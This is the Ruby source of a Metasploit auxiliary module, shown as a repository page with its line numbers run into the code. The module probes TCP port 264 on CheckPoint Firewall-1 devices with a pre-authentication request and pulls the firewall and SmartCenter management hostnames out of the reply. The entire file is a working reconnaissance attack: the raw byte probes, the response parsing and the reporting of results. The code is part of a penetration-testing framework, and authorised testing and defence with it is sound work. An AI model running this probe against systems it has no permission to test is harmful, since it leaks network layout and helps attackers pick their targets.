Path: blob/master/modules/auxiliary/gather/checkpoint_hostname.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Tcp7include Msf::Auxiliary::Report89def initialize(info = {})10super(11update_info(12info,13'Name' => 'CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure',14'Description' => %q{15This module sends a query to the port 264/TCP on CheckPoint Firewall-116firewalls to obtain the firewall name and management station17(such as SmartCenter) name via a pre-authentication request. The string18returned is the CheckPoint Internal CA CN for SmartCenter and the firewall19host. Whilst considered "public" information, the majority of installations20use detailed hostnames which may aid an attacker in focusing on compromising21the SmartCenter host, or useful for government, intelligence and military22networks where the hostname reveals the physical location and rack number23of the device, which may be unintentionally published to the world.24},25'Author' => [ 'aushack' ],26'DisclosureDate' => '2011-12-14', # Looks like this module is first real reference27'References' => [28# aushack - None? Stumbled across, probably an old bug/feature but unsure.29[ 'URL', 'https://web.archive.org/web/20120508142715/http://www.osisecurity.com.au/advisories/checkpoint-firewall-securemote-hostname-information-disclosure' ],30[ 'URL', 'https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk69360' ]31],32'Notes' => {33'Reliability' => UNKNOWN_RELIABILITY,34'Stability' => UNKNOWN_STABILITY,35'SideEffects' => UNKNOWN_SIDE_EFFECTS36}37)38)3940register_options(41[42Opt::RPORT(264),43]44)45end4647def autofilter48false49end5051def run52print_status("Attempting to contact Checkpoint FW1 SecuRemote Topology service...")53fw_hostname = nil54sc_hostname = nil5556connect5758sock.put("\x51\x00\x00\x00")59sock.put("\x00\x00\x00\x21")60res = sock.get_once(4)61if (res and res == "Y\x00\x00\x00")62print_good("Appears to be a CheckPoint Firewall...")63sock.put("\x00\x00\x00\x0bsecuremote\x00")64res = sock.get_once65if (res and res =~ /CN=(.+),O=(.+)\./i)66fw_hostname = $167sc_hostname = $268print_good("Firewall Host: #{fw_hostname}")69print_good("SmartCenter Host: #{sc_hostname}")70end71else72print_error("Unexpected response: '#{res.inspect}'")73end7475report_info(fw_hostname, sc_hostname)7677disconnect78end7980# Only trust that it's real if we have a hostname. If you get a funny81# response, it might not be what we think it is.82def report_info(fw_hostname, sc_hostname)83return unless fw_hostname8485host_info = {86:host => datastore['RHOST'],87:os_name => "Checkpoint Firewall-1",88:purpose => "firewall"89}90host_info[:name] = fw_hostname91host_info[:info] = "SmartCenter Host: #{sc_hostname}" if sc_hostname92report_host(host_info)93svc_info = {94:host => datastore['RHOST'],95:port => datastore['RPORT'],96:proto => "tcp",97:name => "securemote"98}99report_service(svc_info)100end101end102103104